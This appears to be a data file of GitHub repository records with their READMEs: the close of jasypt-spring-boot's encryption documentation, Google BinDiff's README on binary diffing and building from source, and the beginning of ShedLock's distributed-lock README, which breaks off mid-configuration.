There is no program/command to encrypt properties using asymmetric keys but you can use the following code snippet to encrypt
your properties:
#### DER Format
```java
import com.ulisesbocchio.jasyptspringboot.encryptor.SimpleAsymmetricConfig;
import com.ulisesbocchio.jasyptspringboot.encryptor.SimpleAsymmetricStringEncryptor;
import org.jasypt.encryption.StringEncryptor;
public class PropertyEncryptor {
public static void main(String[] args) {
SimpleAsymmetricConfig config = new SimpleAsymmetricConfig();
config.setPublicKey(""MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEArQfyGCvBOdgmDGU6ciGPVNB6jHsMip0b0qOrPvVTSJ/x0offjKARogA2tjGjyr3rUtwg9woMBqv/iyENR0GBnIUa0jkYsznCKeygcflnNa4mrVf7XKXLhSwtY+kCe3diPk+0QPfEsfF9/aK6pWBUFcrE8P2k2sF/8mo8dFJU1t6zQGPspHkNAgR6MLU8SjPZxnMS6EG722MdYhvSYAKsnu02Hozqb4jh/gaQ/E6NkvM3DkqIyIYsRH2smstIFEb9CCiTdiz/OsJKQLgGy/pqIVKtai3lnUxAayEV45Z61rNTOusNJf+icGhZxjqhAeoWjMxOCVmVC2GKa9sisqBgkQIDAQAB"");
StringEncryptor encryptor = new SimpleAsymmetricStringEncryptor(config);
String message = ""chupacabras"";
String encrypted = encryptor.encrypt(message);
System.out.printf(""Encrypted message %s\n"", encrypted);
}
}
```
#### PEM Format
```java
import com.ulisesbocchio.jasyptspringboot.encryptor.SimpleAsymmetricConfig;
import com.ulisesbocchio.jasyptspringboot.encryptor.SimpleAsymmetricStringEncryptor;
import org.jasypt.encryption.StringEncryptor;
import static com.ulisesbocchio.jasyptspringboot.util.AsymmetricCryptography.KeyFormat.PEM;
public class PropertyEncryptor {
public static void main(String[] args) {
SimpleAsymmetricConfig config = new SimpleAsymmetricConfig();
config.setKeyFormat(PEM);
config.setPublicKey(""-----BEGIN PUBLIC KEY-----\n"" +
""MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEArQfyGCvBOdgmDGU6ciGP\n"" +
""VNB6jHsMip0b0qOrPvVTSJ/x0offjKARogA2tjGjyr3rUtwg9woMBqv/iyENR0GB\n"" +
""nIUa0jkYsznCKeygcflnNa4mrVf7XKXLhSwtY+kCe3diPk+0QPfEsfF9/aK6pWBU\n"" +
""FcrE8P2k2sF/8mo8dFJU1t6zQGPspHkNAgR6MLU8SjPZxnMS6EG722MdYhvSYAKs\n"" +
""nu02Hozqb4jh/gaQ/E6NkvM3DkqIyIYsRH2smstIFEb9CCiTdiz/OsJKQLgGy/pq\n"" +
""IVKtai3lnUxAayEV45Z61rNTOusNJf+icGhZxjqhAeoWjMxOCVmVC2GKa9sisqBg\n"" +
""kQIDAQAB\n"" +
""-----END PUBLIC KEY-----\n"");
StringEncryptor encryptor = new SimpleAsymmetricStringEncryptor(config);
String message = ""chupacabras"";
String encrypted = encryptor.encrypt(message);
System.out.printf(""Encrypted message %s\n"", encrypted);
}
}
```
## AES 256-GCM Encryption
As of version 3.0.5, AES 256-GCM Encryption is supported. To use this type of encryption, set the property `jasypt.encryptor.gcm-secret-key-string`, `jasypt.encryptor.gcm-secret-key-location` or `jasypt.encryptor.gcm-secret-key-password`.
The underlying algorithm used is `AES/GCM/NoPadding` so make sure that's installed in your JDK.
The `SimpleGCMByteEncryptor` uses a `IVGenerator` to encrypt properties. You can configure that with property `jasypt.encryptor.iv-generator-classname` if you don't want to
use the default implementation `RandomIvGenerator`
### Using a key
When using a key via `jasypt.encryptor.gcm-secret-key-string` or `jasypt.encryptor.gcm-secret-key-location`, make sure you encode your key in base64.
The base64 string value could set to `jasypt.encryptor.gcm-secret-key-string`, or just can save it in a file and use a spring resource locator to that file in property `jasypt.encryptor.gcm-secret-key-location`. For instance:
```properties
jasypt.encryptor.gcm-secret-key-string=""PNG5egJcwiBrd+E8go1tb9PdPvuRSmLSV3jjXBmWlIU=""
#OR
jasypt.encryptor.gcm-secret-key-location=classpath:secret_key.b64
#OR
jasypt.encryptor.gcm-secret-key-location=file:/full/path/secret_key.b64
#OR
jasypt.encryptor.gcm-secret-key-location=file:relative/path/secret_key.b64
```
Optionally, you can create your own `StringEncryptor` bean:
```java
@Bean(""encryptorBean"")
public StringEncryptor stringEncryptor() {
SimpleGCMConfig config = new SimpleGCMConfig();
config.setSecretKey(""PNG5egJcwiBrd+E8go1tb9PdPvuRSmLSV3jjXBmWlIU="");
return new SimpleGCMStringEncryptor(config);
}
```
### Using a password
Alternatively, you can use a password to encrypt/decrypt properties using AES 256-GCM. The password is used to generate a
key on startup, so there is a few properties you need to/can set, these are:
```properties
jasypt.encryptor.gcm-secret-key-password=""chupacabras""
#Optional, defaults to ""1000""
jasypt.encryptor.key-obtention-iterations=""1000""
#Optional, defaults to 0, no salt. If provided, specify the salt string in ba64 format
jasypt.encryptor.gcm-secret-key-salt=""HrqoFr44GtkAhhYN+jP8Ag==""
#Optional, defaults to PBKDF2WithHmacSHA256
jasypt.encryptor.gcm-secret-key-algorithm=""PBKDF2WithHmacSHA256""
```
Make sure this parameters are the same if you're encrypting your secrets with external tools.
Optionally, you can create your own `StringEncryptor` bean:
```java
@Bean(""encryptorBean"")
public StringEncryptor stringEncryptor() {
SimpleGCMConfig config = new SimpleGCMConfig();
config.setSecretKeyPassword(""chupacabras"");
config.setSecretKeyIterations(1000);
config.setSecretKeySalt(""HrqoFr44GtkAhhYN+jP8Ag=="");
config.setSecretKeyAlgorithm(""PBKDF2WithHmacSHA256"");
return new SimpleGCMStringEncryptor(config);
}
```
### Encrypting properties with AES GCM-256
You can use the [Maven Plugin](#maven-plugin) or follow a similar strategy as explained in [Asymmetric Encryption](#asymmetric-encryption)'s [Encrypting Properties](#encrypting-properties)
## Demo App
The [jasypt-spring-boot-demo-samples](https://github.com/ulisesbocchio/jasypt-spring-boot-samples) repo contains working Spring Boot app examples.
The main [jasypt-spring-boot-demo](https://github.com/ulisesbocchio/jasypt-spring-boot-samples/tree/master/jasypt-spring-boot-demo) Demo app explicitly sets a System property with the encryption password before the app runs.
To have a little more realistic scenario try removing the line where the system property is set, build the app with maven, and the run:
```
java -jar target/jasypt-spring-boot-demo-0.0.1-SNAPSHOT.jar --jasypt.encryptor.password=password
```
And you'll be passing the encryption password as a command line argument.
Run it like this:
```
java -Djasypt.encryptor.password=password -jar target/jasypt-spring-boot-demo-0.0.1-SNAPSHOT.jar
```
And you'll be passing the encryption password as a System property.
If you need to pass this property as an Environment Variable you can accomplish this by creating application.properties or application.yml and adding:
```
jasypt.encryptor.password=${JASYPT_ENCRYPTOR_PASSWORD:}
```
or in YAML
```
jasypt:
encryptor:
password: ${JASYPT_ENCRYPTOR_PASSWORD:}
```
basically what this does is to define the `jasypt.encryptor.password` property pointing to a different property `JASYPT_ENCRYPTOR_PASSWORD` that you can set with an Environment Variable, and you can also override via System Properties. This technique can also be used to translate property name/values for any other library you need.
This is also available in the Demo app. So you can run the Demo app like this:
```
JASYPT_ENCRYPTOR_PASSWORD=password java -jar target/jasypt-spring-boot-demo-1.5-SNAPSHOT.jar
```
**Note:** When using Gradle as build tool, processResources task fails because of '$' character, to solve this you just need to scape this variable like this '\\$'.
## Other Demo Apps
While [jasypt-spring-boot-demo](https://github.com/ulisesbocchio/jasypt-spring-boot-samples/tree/master/jasypt-spring-boot-demo) is a comprehensive Demo that showcases all possible ways to encrypt/decrypt properties, there are other multiple Demos that demo isolated scenarios.
[//]: # (## Flattr)
[//]: # ([![Flattr this git repo](http://api.flattr.com/button/flattr-badge-large.png)](https://flattr.com/@ubocchio/github/ulisesbocchio))
"
google/bindiff,main,1872,101,2023-09-20T06:41:55Z,323705,29,Quickly find differences and similarities in disassembled code,bindiff binexport c-plus-plus diffing ida-plugin ida-pro java program-analysis program-differencing reverse-engineering vxsig,"![BinDiff Logo](docs/images/bindiff-lockup-vertical.png)
Copyright 2011-2024 Google LLC.
# BinDiff
This repository contains the BinDiff source code. BinDiff is an open-source
comparison tool for binary files to quickly find differences and similarities
in disassembled code.
## Table of Contents
- [About BinDiff](#about-bindiff)
- [Quickstart](#quickstart)
- [Documentation](#documentation)
- [Codemap](#codemap)
- [Building from Source](#building-from-source)
- [License](#license)
- [Getting Involved](#getting-involved)
## About BinDiff
BinDiff is an open-source comparison tool for binary files, that assists
vulnerability researchers and engineers to quickly find differences and
similarities in disassembled code.
With BinDiff, researchers can identify and isolate fixes for vulnerabilities in
vendor-supplied patches. It can also be used to port symbols and comments
between disassemblies of multiple versions of the same binary. This makes
tracking changes over time easier and allows organizations to retain analysis
results and enables knowledge transfer among binary analysts.
### Use Cases
* Compare binary files for x86, MIPS, ARM, PowerPC, and other architectures
supported by popular [disassemblers](docs/disassemblers.md).
* Identify identical and similar functions in different binaries
* Port function names, comments and local names from one disassembly to the
other
* Detect and highlight changes between two variants of the same function
## Quickstart
If you want to just get started using BinDiff, download prebuilt installation
packages from the
[releases page](https://github.com/google/bindiff/releases).
Note: BinDiff relies on a separate disassembler. Out of the box, it ships with
support for IDA Pro, Binary Ninja and Ghidra. The [disassemblers page](docs/disassemblers.md) lists the supported configurations.
## Documentation
A subset of the existing [manual](https://www.zynamics.com/bindiff/manual) is
available in the [`docs/` directory](docs/README.md).
## Codemap
BinDiff contains the following components:
* [`cmake`](cmake) - CMake build files declaring external dependencies
* [`fixtures`](fixtures) - A collection of test files to exercise the BinDiff
core engine
* [`ida`](ida) - Integration with the IDA Pro disassembler
* [`java`](java) - Java source code. This contains the the BinDiff visual diff
user interface and its corresponding utility library.
* [`match`](match) - Matching algorithms for the BinDiff core engine
* [`packaging`](packaging) - Package sources for the installation packages
* [`tools`](tools) - Helper executables that are shipped with the product
## Building from Source
The instruction below should be enough to build both the native code and the
Java based components.
More detailed build instructions will be added at a later date. This includes
ready-made `Dockerfile`s and scripts for building the installation packages.
### Native code
BinDiff uses CMake to generate its build files for those components that consist
of native C++ code.
The following build dependencies are required:
* [BinExport](https://github.com/google/binexport) 12, the companion plugin
to BinDiff that also contains a lot of shared code
* Boost 1.71.0 or higher (a partial copy of 1.71.0 ships with BinExport and
will be used automatically)
* [CMake](https://cmake.org/download/) 3.14 or higher
* [Ninja](https://ninja-build.org/) for speedy builds
* GCC 9 or a recent version of Clang on Linux/macOS. On Windows, use the
Visual Studio 2019 compiler and the Windows SDK for Windows 10.
* Git 1.8 or higher
* Dependencies that will be downloaded:
* Abseil, GoogleTest, Protocol Buffers (3.14), and SQLite3
* Binary Ninja SDK
The following build dependencies are optional:
* IDA Pro only: IDA SDK 8.0 or higher (unpack into `deps/idasdk`)
The general build steps are the same on Windows, Linux and macOS. The following
shows the commands for Linux.
Download dependencies that won't be downloaded automatically:
```bash
mkdir -p build/out
git clone https://github.com/google/binexport build/binexport
unzip -q -d build/idasdk
```
Next, configure the build directory and generate build files:
```bash
cmake -S . -B build/out -G Ninja \
-DCMAKE_BUILD_TYPE=Release \
-DCMAKE_INSTALL_PREFIX=build/out \
-DBINDIFF_BINEXPORT_DIR=build/binexport \
""-DIdaSdk_ROOT_DIR=${PWD}build/idasdk""
```
Finally, invoke the actual build. Binaries will be placed in
`build/out/bindiff-prefix`:
```bash
cmake --build build/out --config Release
(cd build/out; ctest --build-config Release --output-on-failure)
cmake --install build/out --config Release
```
### Building without IDA
To build without IDA, simply change the above configuration step to
```bash
cmake -S . -B build/out -G Ninja \
-DCMAKE_BUILD_TYPE=Release \
-DCMAKE_INSTALL_PREFIX=build/out \
-DBINDIFF_BINEXPORT_DIR=build/binexport \
-DBINEXPORT_ENABLE_IDAPRO=OFF
```
### Java GUI and yFiles
Building the Java based GUI requires the commercial third-party graph
visualisation library [yFiles](https://www.yworks.com/products/yfiles) for graph
display and layout. This library is immensely powerful, and not easily
replaceable.
To build, BinDiff uses Gradle 6.x and Java 11 LTS. Refer to its
[installation guide](https://docs.gradle.org/6.8.3/userguide/installation.html)
for instructions on how to install.
Assuming you are a yFiles license holder, set the `YFILES_DIR` environment
variable to a directory containing the yFiles `y.jar` and `ysvg.jar`.
Note: BinDiff still uses the older 2.x branch of yFiles.
Then invoke Gradle to download external dependencies and build:
Windows:
```
set YFILES_DIR=
cd java
gradle shadowJar
```
Linux or macOS:
```
export YFILES_DIR=
cd java
gradle shadowJar
```
Afterwards the directory `ui/build/libs` in the `java` sub-directory should
contain the self-contained `bindiff-ui-all.jar` artifact, which can be run
using the standard `java -jar` command.
## Further reading / Similar tools
The original papers outlining the general ideas behind BinDiff:
* Thomas Dullien and Rolf Rolles. *Graph-Based Comparison of Executable
Objects*. [bindiffsstic05-1.pdf](docs/papers/bindiffsstic05-1.pdf).
SSTIC ’05, Symposium sur la Sécurité des Technologies de l’Information et des
Communications. 2005.
* Halvar Flake. *Structural Comparison of Executable Objects*.
[dimva_paper2.pdf](docs/papers/dimva_paper2.pdf). pp 161-173. Detection of
Intrusions and Malware & Vulnerability Assessment. 2004.3-88579-375-X.
Other tools in the same problem space:
* [Diaphora](https://github.com/joxeankoret/diaphora), an advanced program
diffing tool implementing many of the same ideas.
* [TurboDiff](https://www.coresecurity.com/core-labs/open-source-tools/turbodiff-cs), a now-defunct program diffing plugin for IDA Pro.
Projects using BinDiff:
* [VxSig](https://github.com/google/vxsig), a tool to automatically generate
AV byte signatures from sets of similar binaries.
## License
BinDiff is licensed under the terms of the Apache license. See
[LICENSE](LICENSE) for more information.
## Getting Involved
If you want to contribute, please read [CONTRIBUTING.md](CONTRIBUTING.md)
before sending pull requests. You can also report bugs or file feature
requests.
"
lukas-krecan/ShedLock,master,3371,491,2016-12-11T13:53:59Z,6387,19,Distributed lock for your scheduled tasks,,"ShedLock
========
[![Apache License 2](https://img.shields.io/badge/license-ASF2-blue.svg)](https://www.apache.org/licenses/LICENSE-2.0.txt) [![Build Status](https://github.com/lukas-krecan/ShedLock/workflows/CI/badge.svg)](https://github.com/lukas-krecan/ShedLock/actions) [![Maven Central](https://maven-badges.herokuapp.com/maven-central/net.javacrumbs.shedlock/shedlock-parent/badge.svg)](https://maven-badges.herokuapp.com/maven-central/net.javacrumbs.shedlock/shedlock-parent)
ShedLock makes sure that your scheduled tasks are executed at most once at the same time.
If a task is being executed on one node, it acquires a lock which prevents execution of the same task from another node (or thread).
Please note, that **if one task is already being executed on one node, execution on other nodes does not wait, it is simply skipped**.
ShedLock uses an external store like Mongo, JDBC database, Redis, Hazelcast, ZooKeeper or others for coordination.
Feedback and pull-requests welcome!
#### ShedLock is not a distributed scheduler
Please note that ShedLock is not and will never be full-fledged scheduler, it's just a lock. If you need a distributed
scheduler, please use another project ([db-scheduler](https://github.com/kagkarlsson/db-scheduler), [JobRunr](https://www.jobrunr.io/en/)).
ShedLock is designed to be used in situations where you have scheduled tasks that are not ready to be executed in parallel, but can be safely
executed repeatedly. Moreover, the locks are time-based and ShedLock assumes that clocks on the nodes are synchronized.
+ [Versions](#versions)
+ [Components](#components)
+ [Usage](#usage)
+ [Lock Providers](#configure-lockprovider)
- [JdbcTemplate](#jdbctemplate)
- [R2DBC](#r2dbc)
- [jOOQ](#jooq-lock-provider)
- [Micronaut Data Jdbc](#micronaut-data-jdbc)
- [Mongo](#mongo)
- [DynamoDB](#dynamodb)
- [DynamoDB 2](#dynamodb-2)
- [ZooKeeper (using Curator)](#zookeeper-using-curator)
- [Redis (using Spring RedisConnectionFactory)](#redis-using-spring-redisconnectionfactory)
- [Redis (using Spring ReactiveRedisConnectionFactory)](#redis-using-spring-reactiveredisconnectionfactory)
- [Redis (using Jedis)](#redis-using-jedis)
- [Hazelcast](#hazelcast)
- [Couchbase](#couchbase)
- [ElasticSearch](#elasticsearch)
- [OpenSearch](#opensearch)
- [CosmosDB](#cosmosdb)
- [Cassandra](#cassandra)
- [Consul](#consul)
- [ArangoDB](#arangodb)
- [Neo4j](#neo4j)
- [Etcd](#etcd)
- [Apache Ignite](#apache-ignite)
- [In-Memory](#in-memory)
- [Memcached](#memcached-using-spymemcached)
- [Datastore](#datastore)
+ [Multi-tenancy](#multi-tenancy)
+ [Customization](#customization)
+ [Duration specification](#duration-specification)
+ [Extending the lock](#extending-the-lock)
+ [Micronaut integration](#micronaut-integration)
+ [CDI integration](#cdi-integration)
+ [Locking without a framework](#locking-without-a-framework)
+ [Troubleshooting](#troubleshooting)
+ [Modes of Spring integration](#modes-of-spring-integration)
- [Scheduled method proxy](#scheduled-method-proxy)
- [TaskScheduler proxy](#taskscheduler-proxy)
+ [Release notes](#release-notes)
## Versions
If you are using JDK >17 and up-to-date libraries like Spring 6, use version **5.1.0** ([Release Notes](#500-2022-12-10)). If you
are on older JDK or library, use version **4.44.0** ([documentation](https://github.com/lukas-krecan/ShedLock/tree/version4)).
## Components
Shedlock consists of three parts
* Core - The locking mechanism
* Integration - integration with your application, using Spring AOP, Micronaut AOP or manual code
* Lock provider - provides the lock using an external process like SQL database, Mongo, Redis and others
## Usage
To use ShedLock, you do the following
1) Enable and configure Scheduled locking
2) Annotate your scheduled tasks
3) Configure a Lock Provider
### Enable and configure Scheduled locking (Spring)
First of all, we have to import the project
```xml
net.javacrumbs.shedlockshedlock-spring5.13.0
```
Now we need to integrate the library with Spring. In order to enable schedule locking use `@EnableSchedulerLock` annotation
```java
@Configuration
@EnableScheduling
@EnableSchedulerLock(defaultLockAtMostFor = ""10m"")
class MySpringConfiguration {
...
}
```
### Annotate your scheduled tasks
```java
import net.javacrumbs.shedlock.spring.annotation.SchedulerLock;
...
@Scheduled(...)
@SchedulerLock(name = ""scheduledTaskName"")
public void scheduledTask() {
// To assert that the lock is held (prevents misconfiguration errors)
LockAssert.assertLocked();
// do something
}
```
The `@SchedulerLock` annotation has several purposes. First of all, only annotated methods are locked, the library ignores
all other scheduled tasks. You also have to specify the name for the lock. Only one task with the same name can be executed
at the same time.
You can also set `lockAtMostFor` attribute which specifies how long the lock should be kept in case the
executing node dies. This is just a fallback, under normal circumstances the lock is released as soon the tasks finishes
(unless `lockAtLeastFor` is specified, see below)
**You have to set `lockAtMostFor` to a value which is much longer than normal execution time.** If the task takes longer than
`lockAtMostFor` the resulting behavior may be unpredictable (more than one process will effectively hold the lock).
If you do not specify `lockAtMostFor` in `@SchedulerLock` default value from `@EnableSchedulerLock` will be used.
Lastly, you can set `lockAtLeastFor` attribute which specifies minimum amount of time for which the lock should be kept.
Its main purpose is to prevent execution from multiple nodes in case of really short tasks and clock difference between the nodes.
All the annotations support Spring Expression Language (SpEL).
#### Example
Let's say you have a task which you execute every 15 minutes and which usually takes few minutes to run.
Moreover, you want to execute it at most once per 15 minutes. In that case, you can configure it like this:
```java
import net.javacrumbs.shedlock.core.SchedulerLock;
@Scheduled(cron = ""0 */15 * * * *"")
@SchedulerLock(name = ""scheduledTaskName"", lockAtMostFor = ""14m"", lockAtLeastFor = ""14m"")
public void scheduledTask() {
// do something
}
```
By setting `lockAtMostFor` we make sure that the lock is released even if the node dies. By setting `lockAtLeastFor`
we make sure it's not executed more than once in fifteen minutes.
Please note that **`lockAtMostFor` is just a safety net in case that the node executing the task dies, so set it to
a time that is significantly larger than maximum estimated execution time.** If the task takes longer than `lockAtMostFor`,
it may be executed again and the results will be unpredictable (more processes will hold the lock).
### Configure LockProvider
There are several implementations of LockProvider.
#### JdbcTemplate
First, create lock table (**please note that `name` has to be primary key**)
```sql
# MySQL, MariaDB
CREATE TABLE shedlock(name VARCHAR(64) NOT NULL, lock_until TIMESTAMP(3) NOT NULL,
locked_at TIMESTAMP(3) NOT NULL DEFAULT CURRENT_TIMESTAMP(3), locked_by VARCHAR(255) NOT NULL, PRIMARY KEY (name));
# Postgres
CREATE TABLE shedlock(name VARCHAR(64) NOT NULL, lock_until TIMESTAMP NOT NULL,
locked_at TIMESTAMP NOT NULL, locked_by VARCHAR(255) NOT NULL, PRIMARY KEY (name));
# Oracle
CREATE TABLE shedlock(name VARCHAR(64) NOT NULL, lock_until TIMESTAMP(3) NOT NULL,
locked_at TIMESTAMP(3) NOT NULL, locked_by VARCHAR(255) NOT NULL, PRIMARY KEY (name));
# MS SQL
CREATE TABLE shedlock(name VARCHAR(64) NOT NULL, lock_until datetime2 NOT NULL,
locked_at datetime2 NOT NULL, locked_by VARCHAR(255) NOT NULL, PRIMARY KEY (name));
# DB2
CREATE TABLE shedlock(name VARCHAR(64) NOT NULL PRIMARY KEY, lock_until TIMESTAMP NOT NULL,
locked_at TIMESTAMP NOT NULL, locked_by VARCHAR(255) NOT NULL);
```
Or use [this](micronaut/test/micronaut-jdbc/src/main/resources/db/liquibase-changelog.xml) liquibase change-set.
Add dependency
```xml
net.javacrumbs.shedlockshedlock-provider-jdbc-template5.13.0
```
Configure:
```java
import net.javacrumbs.shedlock.provider.jdbctemplate.JdbcTemplateLockProvider;
...
@Bean
public LockProvider lockProvider(DataSource dataSource) {
return new JdbcTemplateLockProvider(
JdbcTemplateLockProvider.Configuration.builder()
.withJdbcTemplate(new JdbcTemplate(dataSource))
.usingDbTime() // Works on Postgres, MySQL, MariaDb, MS SQL, Oracle, DB2, HSQL and H2
.build()
);
}
```
By specifying `usingDbTime()` the lock provider will use UTC time based on the DB server clock.
If you do not specify this option, clock from the app server will be used (the clocks on app servers may not be
synchronized thus leading to various locking issues).
It's strongly recommended to use `usingDbTime()` option as it uses DB engine specific SQL that prevents INSERT conflicts.
See more details [here](https://stackoverflow.com/a/76774461/277042).
For more fine-grained configuration use other options of the `Configuration` object
```java
new JdbcTemplateLockProvider(builder()
.withTableName(""shdlck"")
.withColumnNames(new ColumnNames(""n"", ""lck_untl"", ""lckd_at"", ""lckd_by""))
.withJdbcTemplate(new JdbcTemplate(getDatasource()))
.withLockedByValue(""my-value"")
.withDbUpperCase(true)
.build())
```
If you need to specify a schema, you can set it in the table name using the usual dot notation
`new JdbcTemplateLockProvider(datasource, ""my_schema.shedlock"")`
To use a database with case-sensitive table and column names, the `.withDbUpperCase(true)` flag can be used.
Default is `false` (lowercase).
#### Warning
**Do not manually delete lock row from the DB table.** ShedLock has an in-memory cache of existing lock rows
so the row will NOT be automatically recreated until application restart. If you need to, you can edit the row/document, risking only
that multiple locks will be held.
#### R2DBC
If you are really brave, you can try experimental R2DBC support. Please keep in mind that the
capabilities of this lock provider are really limited and that the whole ecosystem around R2DBC
is in flux and may easily break.
```xml
net.javacrumbs.shedlockshedlock-provider-r2dbc5.13.0
```
and use it.
```java
@Override
protected LockProvider getLockProvider() {
return new R2dbcLockProvider(connectionFactory);
}
```
I recommend using [R2DBC connection pool](https://github.com/r2dbc/r2dbc-pool).
#### jOOQ lock provider
First, create lock table as described in the [JdbcTemplate](#jdbctemplate) section above.
Add dependency
```xml
net.javacrumbs.shedlockshedlock-provider-jooq5.13.0
```
Configure:
```java
import net.javacrumbs.shedlock.provider.jooq;
...
@Bean
public LockProvider getLockProvider(DSLContext dslContext) {
return new JooqLockProvider(dslContext);
}
```
jOOQ provider has a bit different transactional behavior. While the other JDBC lock providers
create new transaction (with REQUIRES_NEW), jOOQ [does not support setting it](https://github.com/jOOQ/jOOQ/issues/4836).
ShedLock tries to create a new transaction, but depending on your set-up, ShedLock DB operations may
end-up being part of the enclosing transaction.
If you need to configure the table name, schema or column names, you can use jOOQ render mapping as
described [here](https://github.com/lukas-krecan/ShedLock/issues/1830#issuecomment-2015820509).
#### Micronaut Data Jdbc
If you are using Micronaut data and you do not want to add dependency on Spring JDBC, you can use
Micronaut JDBC support. Just be aware that it has just a basic functionality when compared to
the JdbcTemplate provider.
First, create lock table as described in the [JdbcTemplate](#jdbctemplate) section above.
Add dependency
```xml
net.javacrumbs.shedlockshedlock-provider-jdbc-micronaut5.13.0
```
Configure:
```java
import net.javacrumbs.shedlock.provider.jdbc.micronaut.MicronautJdbcLockProvider;
...
@Singleton
public LockProvider lockProvider(TransactionOperations transactionManager) {
return new MicronautJdbcLockProvider(transactionManager);
}
```
#### Mongo
Import the project
```xml
net.javacrumbs.shedlockshedlock-provider-mongo5.13.0
```
Configure:
```java
import net.javacrumbs.shedlock.provider.mongo.MongoLockProvider;
...
@Bean
public LockProvider lockProvider(MongoClient mongo) {
return new MongoLockProvider(mongo.getDatabase(databaseName))
}
```
Please note that MongoDB integration requires Mongo >= 2.4 and mongo-java-driver >= 3.7.0
#### Reactive Mongo
Import the project
```xml
net.javacrumbs.shedlockshedlock-provider-mongo-reactivestreams5.13.0
```
Configure:
```java
import net.javacrumbs.shedlock.provider.mongo.reactivestreams.ReactiveStreamsMongoLockProvider;
...
@Bean
public LockProvider lockProvider(MongoClient mongo) {
return new ReactiveStreamsMongoLockProvider(mongo.getDatabase(databaseName))
}
```
Please note that MongoDB integration requires Mongo >= 4.x and mongodb-driver-reactivestreams 1.x
#### DynamoDB 2
Depends on AWS SDK v2.
Import the project
```xml
net.javacrumbs.shedlockshedlock-provider-dynamodb25.13.0
```
Configure:
```java
import net.javacrumbs.shedlock.provider.dynamodb2.DynamoDBLockProvider;
...
@Bean
public LockProvider lockProvider(software.amazon.awssdk.services.dynamodb.DynamoDbClient dynamoDB) {
return new DynamoDBLockProvider(dynamoDB, ""Shedlock"");
}
```
> Please note that the lock table must be created externally with `_id` as a partition key.
> `DynamoDBUtils#createLockTable` may be used for creating it programmatically.
> A table definition is available from `DynamoDBLockProvider`'s Javadoc.
#### ZooKeeper (using Curator)
Import
```xml
net.javacrumbs.shedlockshedlock-provider-zookeeper-curator5.13.0
```
and configure
```java
import net.javacrumbs.shedlock.provider.zookeeper.curator.ZookeeperCuratorLockProvider;
...
@Bean
public LockProvider lockProvider(org.apache.curator.framework.CuratorFramework client) {
return new ZookeeperCuratorLockProvider(client);
}
```
By default, nodes for locks will be created under `/shedlock` node.
#### Redis (using Spring RedisConnectionFactory)
Import
```xml
net.javacrumbs.shedlockshedlock-provider-redis-spring5.13.0
```
and configure
```java
import net.javacrumbs.shedlock.provider.redis.spring.RedisLockProvider;
import org.springframework.data.redis.connection.RedisConnectionFactory;
...
@Bean
public LockProvider lockProvider(RedisConnectionFactory connectionFactory) {
return new RedisLockProvider(connectionFactory, ENV);
}
```
#### Redis (using Spring ReactiveRedisConnectionFactory)
Import
```xml
net.javacrumbs.shedlockshedlock-provider-redis-spring5.13.0
```
and configure
```java
import net.javacrumbs.shedlock.provider.redis.spring.ReactiveRedisLockProvider;
import org.springframework.data.redis.connection.ReactiveRedisConnectionFactory;
...
@Bean
public LockProvider lockProvider(ReactiveRedisConnectionFactory connectionFactory) {
return new ReactiveRedisLockProvider.Builder(connectionFactory)
.environment(ENV)
.build();
}
```
Redis lock provider uses classical lock mechanism as described [here](https://redis.io/commands/setnx#design-pattern-locking-with-codesetnxcode)
which may not be reliable in case of Redis master failure.
#### Redis (using Jedis)
Import
```xml
net.javacrumbs.shedlockshedlock-provider-redis-jedis45.13.0
```
and configure
```java
import net.javacrumbs.shedlock.provider.redis.jedis.JedisLockProvider;
...
@Bean
public LockProvider lockProvider(JedisPool jedisPool) {
return new JedisLockProvider(jedisPool, ENV);
}
```
#### Hazelcast
Import the project
```xml
net.javacrumbs.shedlockshedlock-provider-hazelcast45.13.0
```
Configure:
```java
import net.javacrumbs.shedlock.provider.hazelcast4.HazelcastLockProvider;
...
@Bean
public HazelcastLockProvider lockProvider(HazelcastInstance hazelcastInstance) {
return new HazelcastLockProvider(hazelcastInstance);
}
```
#### Couchbase
Import the project
```xml
net.javacrumbs.shedlockshedlock-provider-couchbase-javaclient35.13.0
```
Configure:
```java
import net.javacrumbs.shedlock.provider.couchbase.javaclient.CouchbaseLockProvider;
...
@Bean
public CouchbaseLockProvider lockProvider(Bucket bucket) {
return new CouchbaseLockProvider(bucket);
}
```
For Couchbase 3 use `shedlock-provider-couchbase-javaclient3` module and `net.javacrumbs.shedlock.provider.couchbase3` package.
#### Elasticsearch
I am really not sure it's a good idea to use Elasticsearch as a lock provider. But if you have no other choice, you can. Import the project
```xml
net.javacrumbs.shedlockshedlock-provider-elasticsearch85.13.0
```
Configure:
```java
import static net.javacrumbs.shedlock.provider.elasticsearch8.ElasticsearchLockProvider;
...
@Bean
public ElasticsearchLockProvider lockProvider(ElasticsearchClient client) {
return new ElasticsearchLockProvider(client);
}
```
#### OpenSearch
Import the project
```xml
net.javacrumbs.shedlockshedlock-provider-opensearch4.36.1
```
Configure:
```java
import static net.javacrumbs.shedlock.provider.opensearch.OpenSearchLockProvider;
...
@Bean
public OpenSearchLockProvider lockProvider(RestHighLevelClient highLevelClient) {
return new OpenSearchLockProvider(highLevelClient);
}
```
#### CosmosDB
CosmosDB support is provided by a third-party module available [here](https://github.com/jesty/shedlock-provider-cosmosdb)
#### Cassandra
Import the project
```xml
net.javacrumbs.shedlockshedlock-provider-cassandra5.13.0
```
Configure:
```java
import net.javacrumbs.shedlock.provider.cassandra.CassandraLockProvider;
import net.javacrumbs.shedlock.provider.cassandra.CassandraLockProvider.Configuration;
...
@Bean
public CassandraLockProvider lockProvider(CqlSession cqlSession) {
return new CassandraLockProvider(Configuration.builder().withCqlSession(cqlSession).withTableName(""lock"").build());
}
```
Example for creating default keyspace and table in local Cassandra instance:
```sql
CREATE KEYSPACE shedlock with replication={'class':'SimpleStrategy', 'replication_factor':1} and durable_writes=true;
CREATE TABLE shedlock.lock (name text PRIMARY KEY, lockUntil timestamp, lockedAt timestamp, lockedBy text);
```
Please, note that CassandraLockProvider uses Cassandra driver v4, which is part of Spring Boot since 2.3.
#### Consul
ConsulLockProvider has one limitation: lockAtMostFor setting will have a minimum value of 10 seconds. It is dictated by consul's session limitations.
Import the project
```xml
net.javacrumbs.shedlockshedlock-provider-consul5.13.0
```
Configure:
```java
import net.javacrumbs.shedlock.provider.consul.ConsulLockProvider;
...
@Bean // for micronaut please define preDestroy property @Bean(preDestroy=""close"")
public ConsulLockProvider lockProvider(com.ecwid.consul.v1.ConsulClient consulClient) {
